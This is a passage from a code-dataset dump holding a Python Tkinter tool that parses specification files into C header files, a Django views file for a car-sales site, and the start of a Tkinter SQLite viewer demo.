open(specpath,'r',encoding='ansi') as rfh:\r\n s = \" \"\r\n while s:\r\n try:\r\n s = rfh.readline()\r\n except:\r\n logger.warning('Specification-{} Line skipped for parse\\n'.format(s))\r\n if s.startswith(START_HEADER):\r\n logger.info(\",,Start header found...\\n\")\r\n OpD = True\r\n break\r\n elif s.startswith('Input Data'):\r\n logger.info(\",,No Output data in module. Input data found..\\n\")\r\n InD = True\r\n break\r\n if OpD is True or InD is True:\r\n try:\r\n s = rfh.readline()\r\n except:\r\n logger.warning('Specification-{} Line skipped for parse\\n'.format(s))\r\n while s:\r\n if (s.endswith(ID) or s.endswith(CD) or s.endswith(CNFD) or s.endswith(AD) or s.endswith(IA) or s.endswith(ET) or s.endswith(GI) or s.endswith(AC)):\r\n if s.endswith(ID):\r\n #logger.debug(\"Data_Definition string found...Data_Definition string getting parsed...\\n\")\r\n InD = True\r\n Data_Definition_str = s\r\n #Data_Definition = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n elif s.endswith(CD):\r\n if InD is True:\r\n logger.debug(\"Input_Data string found...Input_Data string getting parsed...\\n\")\r\n Input_Data_str = s\r\n Input_Data = Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n elif OpD is True:\r\n #logger.debug(\"Data_Definition string found...Data_Definition string getting parsed...\\n\")\r\n Data_Definition_str = s\r\n #Data_Definition = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n else:\r\n pass\r\n CaD = True\r\n elif s.endswith(CNFD):\r\n if CaD is True:\r\n #logger.debug(\"Calibration_Data string found...Calibration_Data string getting parsed...\\n\")\r\n Calibration_Data_str = s\r\n #Calibration_Data = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n elif InD is True:\r\n logger.debug(\"Input_Data string found...Input_Data string getting parsed...\\n\")\r\n Input_Data_str = s\r\n Input_Data = Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif OpD is True:\r\n #logger.debug(\"Data_Definition string found...Data_Definition string getting parsed...\\n\")\r\n Data_Definition_str = s\r\n #Data_Definition = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n else:\r\n pass\r\n CnD = True\r\n elif s.endswith(AD):\r\n if CnD is True:\r\n logger.debug(\"Configuration_Data string found...Configuration_Data string getting parsed...\\n\")\r\n Configuration_Data_str = s\r\n Configuration_Data = Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif CaD is True:\r\n #logger.debug(\"Calibration_Data string found...Calibration_Data string getting parsed...\\n\")\r\n Calibration_Data_str = 
s\r\n #Calibration_Data = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n elif InD is True:\r\n logger.debug(\"Input_Data string found...Input_Data string getting parsed...\\n\")\r\n Input_Data_str = s\r\n Input_Data = Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif OpD is True:\r\n #logger.debug(\"Data_Definition string found...Data_Definition string getting parsed...\\n\")\r\n Data_Definition_str = s\r\n #Data_Definition = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n else:\r\n pass\r\n AcD = True\r\n elif s.endswith(IA):\r\n if AcD is True:\r\n #Action_Definitions = Parse_Inputs(s)\r\n pass\r\n elif CnD is True:\r\n logger.debug(\"Configuration_Data string found...Configuration_Data string getting parsed...\\n\")\r\n Configuration_Data_str = s\r\n Configuration_Data = Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif CaD is True:\r\n #logger.debug(\"Calibration_Data string found...Calibration_Data string getting parsed...\\n\")\r\n Calibration_Data_str = s\r\n #Calibration_Data = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n elif InD is True:\r\n logger.debug(\"Input_Data string found...Input_Data string getting parsed...\\n\")\r\n Input_Data_str = s\r\n Input_Data = Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif OpD is True:\r\n #logger.debug(\"Data_Definition string found...Data_Definition string getting parsed...\\n\")\r\n Data_Definition_str = s\r\n #Data_Definition = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n else:\r\n pass\r\n ImA = True\r\n elif s.endswith(ET):\r\n if ImA is True:\r\n logger.debug(\"Import_Actions string found...Import_Actions string getting parsed...\\n\")\r\n Import_Actions_str = s\r\n Import_Actions = Parse_ImActions(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif AcD is True:\r\n #Action_Definitions = Parse_ImActions(s)\r\n pass\r\n elif CnD is True:\r\n logger.debug(\"Configuration_Data string found...Configuration_Data string getting parsed...\\n\")\r\n Configuration_Data_str = s\r\n Configuration_Data = Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif CaD is True:\r\n #logger.debug(\"Calibration_Data string found...Calibration_Data string getting parsed...\\n\")\r\n Calibration_Data_str = s\r\n #Calibration_Data = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n elif InD is True:\r\n logger.debug(\"Input_Data string found...Input_Data string getting parsed...\\n\")\r\n Input_Data_str = s\r\n Input_Data = Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif OpD is True:\r\n #logger.debug(\"Data_Definition string found...Data_Definition string getting parsed...\\n\")\r\n Data_Definition_str = s\r\n #Data_Definition = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n else:\r\n pass\r\n EtD = True\r\n elif s.endswith(GI) or s.endswith(AC):\r\n if EtD is True:\r\n #Error_Treatment = Parse_Inputs(s)\r\n pass\r\n elif ImA is True:\r\n logger.debug(\"Import_Actions string found...Import_Actions string getting parsed...\\n\")\r\n Import_Actions_str = s\r\n Import_Actions = Parse_ImActions(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif AcD is True:\r\n #Action_Definitions = Parse_ImActions(s)\r\n pass\r\n elif CnD is True:\r\n logger.debug(\"Configuration_Data string found...Configuration_Data string getting parsed...\\n\")\r\n Configuration_Data_str = s\r\n Configuration_Data = 
Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif CaD is True:\r\n #logger.debug(\"Calibration_Data string found...Calibration_Data string getting parsed...\\n\")\r\n Calibration_Data_str = s\r\n #Calibration_Data = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n elif InD is True:\r\n logger.debug(\"Input_Data string found...Input_Data string getting parsed...\\n\")\r\n Input_Data_str = s\r\n Input_Data = Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif OpD is True:\r\n #logger.debug(\"Data_Definition string found...Data_Definition string getting parsed...\\n\")\r\n Data_Definition_str = s\r\n #Data_Definition = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n else:\r\n pass\r\n GnI = True \r\n else:\r\n pass\r\n try:\r\n s = rfh.readline()\r\n except:\r\n logger.warning('Specification-{} Line skipped for parse\\n'.format(s))\r\n else:\r\n try:\r\n s = s + rfh.readline()\r\n except:\r\n logger.warning('Specification-{} Line skipped for parse\\n'.format(s))\r\n \r\n if GnI is True:\r\n break\r\n logger.info(\",,Spec Parse process over\\n\")\r\n else:\r\n logger.error(\"No Input data or Output data found in module\\n\")\r\n logger.debug(\"Spec closed. \\n\")\r\n\r\n if OpD is True or InD is True:\r\n if OpD is True:\r\n logger.debug(\"Data_Definition_str : {} \\n\".format(Data_Definition_str))\r\n if InD is True:\r\n logger.debug(\"Input_Data_str : {} \\n\".format(Input_Data_str))\r\n if CaD is True:\r\n logger.debug(\"Calibration_Data_str : {} \\n\".format(Calibration_Data_str))\r\n if CnD is True:\r\n logger.debug(\"Configuration_Data_str : {} \\n\".format(Configuration_Data_str))\r\n if ImA is True:\r\n logger.debug(\"Import_Actions_str : {} \\n\".format(Import_Actions_str))\r\n\r\n logger.info(\",,Creating module_inputs.h ...\\n\")\r\n with open(os.path.join(pp_folder_path,'module_inputs.h'),'w') as wfh:\r\n logger.info(\",,Creating input data declarations list ...\\n\")\r\n dl = []\r\n for data in Input_Data:\r\n logger.debug(\"Identifying data tyoe of {} ...\\n\".format(data.name))\r\n dt = identify_DT(data.hexR)\r\n logger.debug(\"Identified as {}..\\n\".format(dt))\r\n logger.debug(\"Creating declaration..\\n\")\r\n if data.name.startswith('NC') or data.name.startswith('NLC'):\r\n pass\r\n elif data.name.startswith('LV_'):\r\n if data.name.find('[')>-1:\r\n name = data.name[0:data.name.find('[')].lower()+data.name[data.name.find('['):]\r\n else:\r\n name = data.name.lower()\r\n dl.append('extern\\tflag\\t'+name+';\\n')\r\n elif data.name.startswith('LC_') or data.name.startswith('C_') or data.name.startswith('CLF_'):\r\n if data.name.find('[')>-1:\r\n name = data.name[0:data.name.find('[')].lower()+data.name[data.name.find('['):]\r\n else:\r\n name = data.name.lower()\r\n dl.append('extern\\tconst\\t'+dt+'\\t'+name+';\\n')\r\n elif data.name.startswith('IP_') or data.name.startswith('ID_'):\r\n if data.name.find('[')>-1:\r\n name = data.name[0:data.name.find('[')].lower()\r\n else:\r\n name = data.name.lower()\r\n maiden_name = name\r\n for dim in data.size:\r\n name = name + '[' + dim + ']'\r\n dl.append('extern\\tconst\\t'+dt+'\\t'+name+';\\n')\r\n prefix = ['X_','Y_','Z_']\r\n for ax in data.axis:\r\n dl.append('#define\\t'+prefix.pop(0)+maiden_name+'\\t'+ax+'\\n')\r\n elif data.name.startswith('LDP'):\r\n if data.name.find('[')>-1:\r\n name = data.name[0:data.name.find('[')].lower()\r\n else:\r\n name = data.name.lower()\r\n name = name + '[' + data.mode + '+1]'\r\n 
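# data.mode holds the axis size define, so the axis table is declared with one extra element\r\n 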
dl.append('extern\\tconst\\t'+dt+'\\t'+name+';\\n')\r\n else:\r\n if data.name.find('[')>-1:\r\n name = data.name[0:data.name.find('[')].lower()+data.name[data.name.find('['):]\r\n else:\r\n name = data.name.lower()\r\n dl.append('extern\\t'+dt+'\\t'+name+';\\n')\r\n logger.info(\",,Declaration creation process over..\\n\")\r\n logger.info(\",,Entering fetch_NC_def_frmPP for Fetching collected NC's definition from PP folder\\n\") \r\n fetched_ncees = fetch_NC_def_frmPP(pp_folder_path)\r\n logger.info(\",,Out of fetch_NC_def_frmPP..\\n\")\r\n logger.debug(\"Fetch complete in fetched_ncees = {}\\nWritting it to module_inputs.h now\\n\".format(fetched_ncees))\r\n wfh.write(\"#ifndef MODULE_INPUTS_H\\n\")\r\n wfh.write(\"#define MODULE_INPUTS_H\\n\")\r\n wfh.write('\\n'*2)\r\n for nc in fetched_ncees:\r\n wfh.write(nc)\r\n logger.debug(\"Writting data declarations to module_inputs.h\\n\")\r\n for data in sorted(set(dl)):\r\n wfh.write(data)\r\n try:\r\n logger.info(\",,Entering fetch_ACTIONdefs_frmPP\\n\")\r\n logger.debug(\"Fetching needed action defs from PIS\\n\")\r\n actions_dict = fetch_ACTIONdefs_frmPP(pp_folder_path)\r\n logger.info(\",,Out of fetch_ACTIONdefs_frmPP..\\n\")\r\n logger.debug(\"Fetch completed in form of ACTION dictionary : {}\\nNow writting it to module_inputs.h\\n\".format(actions_dict))\r\n logger.debug(\"Import_Actions : {}\".format(Import_Actions))\r\n for actions_1 in Import_Actions:\r\n if actions_1 in actions_dict:\r\n if len(set(actions_dict[actions_1]))>1:\r\n comment = \"/*Warning : {} declarations available. Choose one by commenting others*/\\n\".format(len(set(actions_dict[actions_1])))\r\n wfh.write(comment)\r\n for defs in set(actions_dict[actions_1]):\r\n wfh.write(defs)\r\n else:\r\n for defs in set(actions_dict[actions_1]):\r\n wfh.write(defs)\r\n else:\r\n comment = \"/*Info : Import Action '{}' does not exist in PIS. Please create a stub here*/\\n\".format(actions_1)\r\n wfh.write(comment)\r\n except:\r\n logger.error(\"Exception occured while collecting or writting Actions - fn name - {}\\n\".format('fetch_ACTIONdefs_frmPP'))\r\n wfh.write('\\n'*2)\r\n wfh.write(\"#endif\")\r\n else:\r\n logger.error(\"No Input data or Output data found in module\\n\")\r\n else:\r\n logger.error(\"Exception : Invalid Specpath!! Path should end with .doc Eg: d\\work\\MCXXXX01.00A.DOC \\n PS:Export spec in .doc format from Limas\\n\")\r\n fail_message = \"Invalid Specpath!! Export spec in .doc format from Limas\\n\"\r\n lo_label3.config(fg='#ff0000',text = fail_message) \r\n \r\n\r\ndef copy_grls(entry3):\r\n global Input_folder_path\r\n global work_folder_path\r\n global var\r\n entry3 = entry3.lower()\r\n logger.debug(\"Proceeding to copy grl's by scanning checkbutton...\")\r\n if var.get()==1:\r\n logger.debug(\"Checkbutton enabled. 
Looking for files...\")\r\n for root,dirs,files in os.walk(work_folder_path):\r\n for file in files:\r\n if file.endswith('.grl') and file.startswith(entry3):\r\n if entry3+'.grl' == file:\r\n shutil.copyfile(os.path.join(root,file),os.path.join(Input_folder_path,file))\r\n if entry3+'_prj.grl' == file:\r\n shutil.copyfile(os.path.join(root,file),os.path.join(Input_folder_path,file))\r\n if file.startswith(entry3+'_confi'):\r\n shutil.copyfile(os.path.join(root,file),os.path.join(Input_folder_path,file))\r\n if file.startswith(entry3+'_nvdat'):\r\n shutil.copyfile(os.path.join(root,file),os.path.join(Input_folder_path,file))\r\n for root,dirs,files in os.walk(work_folder_path):\r\n for file in files:\r\n if file == 'fcut.grl':\r\n logger.debug(\"Copying fcut grl file...\")\r\n shutil.copyfile(os.path.join(root,'fcut.grl'),os.path.join(Input_folder_path,'fcut.grl'))\r\n if file == 'local_data_type.grl':\r\n logger.debug(\"Copying local_data_type grl file...\")\r\n shutil.copyfile(os.path.join(root,'local_data_type.grl'),os.path.join(Input_folder_path,'local_data_type.grl'))\r\n\r\n\r\ndef collect_nc_data_n_actions(specpath,base_path,pp_folder_path):\r\n global work_folder_path\r\n global logger\r\n work_folders = ['asw','bsw','aggr']\r\n work_folder_path = os.path.join(base_path,'work')\r\n if os.path.isdir(os.path.join(work_folder_path,'app')):\r\n work_folders.append('app')\r\n logger.info(\",Proceeding to collect ACTIONS\\n\")\r\n with open(os.path.join(pp_folder_path,'all_actions.h'), \"w\") as wfh_var:\r\n wfh_var.write('#ifndef ALL_ACTIONS_H\\n')\r\n wfh_var.write('#define ALL_ACTIONS_H\\n')\r\n #collecting actions\r\n for dirss in work_folders:\r\n logger.debug(\"Scanning directory {} for action prototypes...\".format(dirss))\r\n action_folder_path = os.path.join(work_folder_path,dirss)\r\n for roott, dirrs, filess in os.walk(action_folder_path):\r\n for file in filess:\r\n if file.endswith('.h') and (not file.endswith('_mcr.h')):\r\n logger.debug(\"{} scanning\".format(file))\r\n if not (file == 'efx.h'):\r\n with open(os.path.join(roott,file), \"r\") as rfhh:\r\n s = \" \"\r\n while(s):\r\n try:\r\n s = rfhh.readline()\r\n if s.strip().startswith('extern'):\r\n s = s.strip()\r\n L = s.split()\r\n size = len(L)\r\n if size>2:\r\n if L[2].startswith('ACTION_') and (s[-1] == ';'):\r\n wfh_var.write(s+'\\n')\r\n except:\r\n logger.warning(',,{}-{} - Line skipped for parse. It contains unknown chars. 
FUNC - collect_nc_data_n_actions\\n'.format(file,s))\r\n\r\n wfh_var.write('#endif\\n')\r\n logger.info(\",ACTION's collected!!\")\r\n try:\r\n logger.info(\",Spec parsing started for spec {}...\\n\".format(specpath))\r\n spec_parser(specpath,pp_folder_path)\r\n logger.info(\",Spec parsing complete with out errors!!\")\r\n except:\r\n logger.error(\"Exception occured while parsing spec\\n\")\r\n\r\ndef create_dummy_files(filepath,pp_folder_path,path_for_CI_folder):\r\n global Input_folder_path\r\n namelist = []\r\n logger.debug(\"Opening the file to collect list of needed headers...!!\")\r\n with open(filepath, \"r\") as rfh_1:\r\n s = \" \"\r\n while(s):\r\n try:\r\n s = rfh_1.readline()\r\n except:\r\n logger.warning('create_dummy_files1-{} Line skipped for parse'.format(s))\r\n if s.startswith('#include'):\r\n logger.debug(\"#include found in - {}\".format(s))\r\n s = s.strip()\r\n L = re.split('[><]',s)\r\n logger.debug(\"Split string : {}\".format(L))\r\n size = len(L)\r\n if size>1:\r\n name = L[1].strip()\r\n namelist.append(name)\r\n finallist = set(namelist)\r\n path_split = str(filepath).split('\\\\')\r\n module_name = path_split[-1].replace('.c','')\r\n imfile = module_name+'_im.h'\r\n if imfile in finallist:\r\n logger.debug(\"module import header found...\")\r\n ext_path = str(filepath).replace('.c','_im.h')\r\n logger.debug(\"new path : {}...\".format(ext_path))\r\n ext_path = pathlib.Path(pathlib.PureWindowsPath(ext_path))\r\n namelist = []\r\n with open(ext_path, \"r\") as rfh_2:\r\n logger.debug(\"module import header opened for reading...\")\r\n s = \" \"\r\n while(s):\r\n try:\r\n s = rfh_2.readline()\r\n except:\r\n logger.warning('create_dummy_files2 - {} Line skipped for parse'.format(s))\r\n if s.startswith('#include'):\r\n logger.debug(\"#include found in - {}\".format(s))\r\n s = s.strip()\r\n L = s.split('<')\r\n size = len(L)\r\n if size>1:\r\n name = L[1][:-1]\r\n namelist.append(name)\r\n for files in namelist:\r\n finallist.add(files)\r\n logger.debug(\"List obtained!! 
\\nProceeding to create Collect_Inputs_module_name folder and dummy headers...!!\")\r\n try:\r\n col_inp_fol = os.path.join(path_for_CI_folder,'Collect_Inputs')\r\n fol_name = 'Collect_Inputs_'+module_name\r\n Input_folder_path = os.path.join(col_inp_fol,fol_name)\r\n f = [x[1] for x in os.walk(path_for_CI_folder)]\r\n if 'Collect_Inputs' in f[0]:\r\n g = [y[1] for y in os.walk(col_inp_fol)]\r\n if fol_name in g[0]:\r\n shutil.rmtree(Input_folder_path)\r\n os.mkdir(Input_folder_path)\r\n else:\r\n os.mkdir(Input_folder_path)\r\n else:\r\n os.mkdir(col_inp_fol)\r\n os.mkdir(Input_folder_path)\r\n logger.debug(\"{} folder created !!\\nCreating headers {}...!!\".format(fol_name,finallist))\r\n for names in finallist:\r\n with open(os.path.join(Input_folder_path,names), \"w\") as wfh_1:\r\n name = names.upper()\r\n name = name.replace('.','_')\r\n guard1 = '#ifndef '+name\r\n guard2 = '#define '+name\r\n guard3 = '#endif'\r\n wfh_1.write(guard1 + '\\n')\r\n wfh_1.write(guard2)\r\n wfh_1.write('\\n'*10)\r\n wfh_1.write(guard3)\r\n logger.debug(\"Headers created !!Moving module_inputs.h,all_actions.h,all_hash_defines.h to {} folder\\n\".format(fol_name))\r\n shutil.move(os.path.join(pp_folder_path,'module_inputs.h'),os.path.join(Input_folder_path,'module_inputs.h'))\r\n shutil.move(os.path.join(pp_folder_path,'all_actions.h'),os.path.join(Input_folder_path,'all_actions.h'))\r\n shutil.move(os.path.join(pp_folder_path,'all_hash_defines.h'),os.path.join(Input_folder_path,'all_hash_defines.h'))\r\n logger.debug(\"Move complete!!\")\r\n except:\r\n logger.error(\"Exception occoured while removing old {} folder and \\nsubsequently creating dummy files!!\".format(fol_name))\r\n fail_message = \"Exception occoured while removing old {} folder and \\nsubsequently creating dummy files!!\\nEnsure {} folder or its files are not in use.\".format(fol_name,fol_name)\r\n lo_label3.config(fg='#ff0000',text = fail_message)\r\n\r\ndef setuplogger(path_for_CI_folder):\r\n #Create and configure logger\r\n logging.basicConfig(filename=os.path.join(path_for_CI_folder,\"debug_log.csv\"), format='%(levelname)s,%(asctime)s,%(message)s', filemode='w')\r\n #Setting the threshold of logger to DEBUG\r\n logger.setLevel(logging.DEBUG)\r\n\r\ndef gen_file_api(entry,entry3,entry2):\r\n global Input_folder_path\r\n pp_folder_path = \"\"\r\n pp_fol_exist = False\r\n start = time.time()\r\n filepath = pathlib.Path(pathlib.PureWindowsPath(entry))\r\n specpath = pathlib.Path(pathlib.PureWindowsPath(entry2))\r\n split_fp = str(filepath).split('\\\\')\r\n base_path = \"\"\r\n valid_path = False\r\n for fols in split_fp:\r\n if fols != 'work':\r\n base_path = base_path+fols+'\\\\'\r\n PIS = fols\r\n else:\r\n valid_path = True\r\n break\r\n path_for_CI_folder = base_path.replace(PIS+'\\\\',\"\")\r\n if valid_path is True:\r\n setuplogger(path_for_CI_folder)\r\n fols_in_PIS = os.listdir(base_path)\r\n \r\n if os.path.isdir(os.path.join(base_path,pp_folder_td4)):\r\n pp_folder_path = os.path.join(base_path,pp_folder_td4)\r\n pp_fol_exist = True\r\n else:\r\n for dirss in fols_in_PIS:\r\n if dirss.startswith('_FS_'):\r\n pp_folder_path = os.path.join(base_path,dirss,pp_folder_td5)\r\n pp_fol_exist = True\r\n break\r\n if pp_fol_exist is True: \r\n logger.debug(\"Logger setup...\")\r\n logger.info(\"Entered C-file path: <{}>\\n\".format(filepath))\r\n logger.info(\"Entered Spec path: <{}>\\n\".format(specpath))\r\n logger.info(\"Entered aggr: <{}>,Tick enabled: <{}>\\n\".format(entry3,var.get())) \r\n logger.debug(\"Base Path: 
<{}>\\n\".format(base_path))\r\n logger.info(\"Preprocess Folder Path: <{}>\\n\".format(pp_folder_path))\r\n logger.debug(\"Proceeding to collect NC's, variables and ACTION's...\\n\") \r\n try:\r\n logger.info(\"Entering COLLECT_NC_DATA_N_ACTIONS\\n\")\r\n collect_nc_data_n_actions(specpath,base_path,pp_folder_path)\r\n logger.info(\"Out of COLLECT_NC_DATA_N_ACTIONS\\n\")\r\n logger.debug(\"NC's, variables and ACTION's collected successfully !!Proceeding to create dummy headers...\\n\") \r\n try:\r\n logger.info(\"Entering CREATE_DUMMY_FILES\\n\")\r\n create_dummy_files(filepath,pp_folder_path,path_for_CI_folder)\r\n logger.info(\"Out of CREATE_DUMMY_FILES\\n\")\r\n logger.debug(\"Creation of Collect_Inputs_module name folder and dummy headers successful !!Proceeding to copy grl's...\\n\") \r\n try:\r\n logger.info(\"Entering COPY_GRLS\\n\")\r\n copy_grls(entry3)\r\n logger.info(\"Out of COPY_GRLS\\n\")\r\n logger.debug(\"Copy successfull !!\\nReady for next run...\\n\")\r\n logger.debug(\"---------------------------------------------\"*3)\r\n shutil.copyfile(os.path.join(path_for_CI_folder,'debug_log.csv'),os.path.join(Input_folder_path,'debug_log.csv'))\r\n end = time.time()\r\n tt = round((end-start),3)\r\n pass_message = \"Find all inputs in Collect_Inputs_module_name folder created at\\n\"+Input_folder_path+\"\\nTask finished in {a} secs.\".format(a=tt)\r\n lo_label3.config(fg='#000099',text = pass_message)\r\n except:\r\n logger.error(\"Exception occoured while in COPY_GRLS\\n\")\r\n fail_message = \"Exception occoured while copying grl files!!\"\r\n lo_label3.config(fg='#ff0000',text = fail_message)\r\n except:\r\n logger.error(\"Exception occoured while in CREATE_DUMMY_FILES\\n\")\r\n fail_message = \"Exception occoured while creating dummy files!!\\nPlease check the entered path:{a}\\nIdeally it should end with a c-file name available inside work folder\".format(a=entry)\r\n lo_label3.config(fg='#ff0000',text = fail_message)\r\n except:\r\n logger.error(\"Exception occoured while in COLLECT_NC_DATA_N_ACTIONS\\n\")\r\n fail_message = \"Exception occoured while collecting NC's, data and actions!!\"\r\n lo_label3.config(fg='#ff0000',text = fail_message)\r\n else:\r\n logger.error(\"Exception occoured while accessing preprocess_gen folder. Please use builded software.\\n\")\r\n fail_message = \"Exception occoured while finding preprocess_gen folder for selected build platform.\\n Please use builded software.\"\r\n lo_label3.config(fg='#ff0000',text = fail_message)\r\n else:\r\n fail_message = \"Invalid path!! 
\\nCopy the full file path\"\r\n lo_label3.config(fg='#ff0000',text = fail_message)\r\n\r\n \r\ncanvas = tk.Canvas(root, height=HEIGHT, width=WIDTH,bg='#FAD15A' )\r\ncanvas.pack()\r\nframe = tk.Frame(root, bd=5,highlightbackground=\"black\",highlightthickness=1)\r\nframe.place(relx=0.008,rely=0.025,relwidth=0.984,relheight=0.115)\r\nframe2 = tk.Frame(root, bd=5,highlightbackground=\"black\",highlightthickness=1)\r\nframe2.place(relx=0.008,rely=0.155,relwidth=0.984,relheight=0.115)\r\nlabel = tk.Label(frame, text=\"C-File:\", font=('Times',15))\r\nlabel.place(relx=0.0001,relwidth=0.08,relheight=1)\r\nentry1 = tk.Entry(frame, bg='white',font=('Serif',12))\r\nentry1.place(relx=0.090,relwidth=0.75,relheight=1)\r\n\r\nlabel2 = tk.Label(frame2, text=\"Spec:\", font=('Times',15))\r\nlabel2.place(relx=0.0001,relwidth=0.08,relheight=1)\r\nentry2 = tk.Entry(frame2, bg='white',font=('Serif',12))\r\nentry2.place(relx=0.090,relwidth=0.91,relheight=1)\r\n\r\nlower_frame = tk.Frame(root, bd=5,highlightbackground=\"black\",highlightthickness=1)\r\nentry3 = tk.Entry(lower_frame, bg='white',font=(\"Serif\",12))\r\nlowerside_frame = tk.Frame(root, bd=5,highlightbackground=\"black\",highlightthickness=1)\r\nlabel_lsf = tk.Label(lowerside_frame, text=\"Build Platform :\", font=('Serif',11,'bold'))\r\n\r\nbutton = tk.Button(frame, text=\"Generate Files\", bg='#c2c2a3', font=('Times',14), command=lambda: gen_file_api(entry1.get(),entry3.get(),entry2.get()))\r\nbutton.place(relx=0.845,relwidth=0.1549,relheight=1)\r\nbutton.config(state=DISABLED)\r\n\r\nlower_frame.place(relx=0.008,rely=0.285,relwidth=0.5, relheight=0.205)\r\nentry3.place(relx=0.08,rely=0.5,relwidth=0.15,relheight=0.39)\r\nentry3.config(state=DISABLED)\r\n\r\ndef Rbuttoncheck():\r\n global v\r\n if v.get() == '1' or v.get() == '2':\r\n button.config(state=NORMAL)\r\n else:\r\n button.config(state=DISABLED)\r\n\r\nlowerside_frame.place(relx=0.516,rely=0.285,relwidth=0.476, relheight=0.205)\r\nlabel_lsf.place(relx=0.008,rely=0.1,relwidth=0.3,relheight=0.3)\r\nfor (text, value) in values.items(): \r\n Radiobutton(lowerside_frame, text = text, variable = v, value = value, command=Rbuttoncheck).pack(side = TOP, ipady = 8)\r\n\r\ndef activateCheck():\r\n global var\r\n if var.get() == 1:\r\n entry3.config(state=NORMAL)\r\n elif var.get() == 0:\r\n entry3.config(state=DISABLED)\r\n\r\ncb = tk.Checkbutton(lower_frame,text='Enable to copy aggr specific common grl files',font=('Serif',11,'bold'),variable=var,command=activateCheck,anchor='nw')\r\ncb.place(rely=0.03,relwidth=1,relheight=0.45)\r\n\r\nlower_frame2 = tk.Frame(root,bg='#f6f678', bd=3,highlightbackground=\"black\",highlightthickness=1)\r\nlower_frame2.place(relx=0.008,rely=0.505,relwidth=0.984,relheight=0.48)\r\n\r\nlo_label3 = tk.Label(lower_frame2,font=('Serif',10,'bold'),anchor='nw', justify='left')\r\nlo_label3.place(relx=0.0001,rely=0,relwidth=0.9998,relheight=1)\r\n\r\nroot.mainloop()\r\n","repo_name":"dreamgoogle/python_stuff","sub_path":"input_data_from_pp_gui.py","file_name":"input_data_from_pp_gui.py","file_ext":"py","file_size_in_byte":49047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"920102865","text":"from django.contrib.auth.models import User\nfrom django.core.mail import send_mail\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom carzone import settings\nfrom .models import *\nfrom cars.models import *\n\n# Create your views here.\ndef 
home(request):\n team = Team.objects.all()\n featured_cars = Car.objects.order_by(\"-created_date\").filter(is_featured=True)\n all_cars = Car.objects.order_by(\"created_date\")\n model_search = Car.objects.values_list('model',flat=True).distinct()\n city_search = Car.objects.values_list('city', flat=True).distinct()\n year_search = Car.objects.values_list('year', flat=True).distinct()\n body_style_search = Car.objects.values_list('body_style', flat=True).distinct()\n data = {\n 'teams':team,\n 'featured_cars':featured_cars,\n 'all_cars':all_cars,\n 'model_search':model_search,\n 'city_search':city_search,\n 'year_search':year_search,\n 'body_style_search':body_style_search,\n }\n return render(request, 'pages/home.html',data)\ndef about(request):\n team = Team.objects.all()\n data = {\n 'teams':team,\n }\n return render(request, 'pages/about.html', data)\n\ndef services(request):\n return render(request, 'pages/services.html', {})\n\ndef contact(request):\n if request.method == 'POST':\n name = request.POST.get('name')\n email = request.POST.get('email')\n subject = request.POST.get('subject')\n phone = request.POST.get('phone')\n message = request.POST.get('message')\n\n # admin_info = User.objects.get(is_superuser=True).email\n # send_mail(\n # f'{name} / {subject} / {phone} ',\n # message,\n # settings.EMAIL_HOST_USER,\n # [email,admin_info],\n # fail_silently=False,\n # )\n\n messages.success(request,'Thank you for contacting us')\n\n return redirect('contact')\n\n return render(request, 'pages/contact.html', {})","repo_name":"kmard/carzone_project","sub_path":"pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7634655090","text":"from tkinter import *\nimport tkinter.ttk as ttk\nimport connection\n\ndb = \"./sqlite.db\" #container db location\n\nroot = Tk()\nroot.title(\"Python - Display SQLite3 Data In TreeView\")\nscreen_width = root.winfo_screenwidth()\nscreen_height = root.winfo_screenheight()\nwidth = 1000\nheight = 800\nx = (screen_width/2) - (width/2)\ny = (screen_height/2) - (height/2)\nroot.geometry('%dx%d+%d+%d' % (width, height, x, y))\nroot.resizable(1,1)\n\n#==================================FRAME==============================================\nTop = Frame(root, width=700, height=50, bd=9, relief=\"raise\")\nTop.pack(side=TOP)\nButton_Group=Frame(root, width=700, height=50)\nButton_Group.pack(side=TOP)\nButtons = Frame(Button_Group, width=200, height=50)\nButtons.pack(side=LEFT)\nButtons1 = Frame(Button_Group, width=500, height=50)\nButtons1.pack(side=RIGHT)\n\nV_Group=Frame(root, width=700, height=50,background='red')\nV_Group.pack(side=TOP)\nVL_Group=Frame(V_Group, width=700, height=50)\nVL_Group.pack(side=LEFT)\nLabels = Frame(VL_Group, width=200, 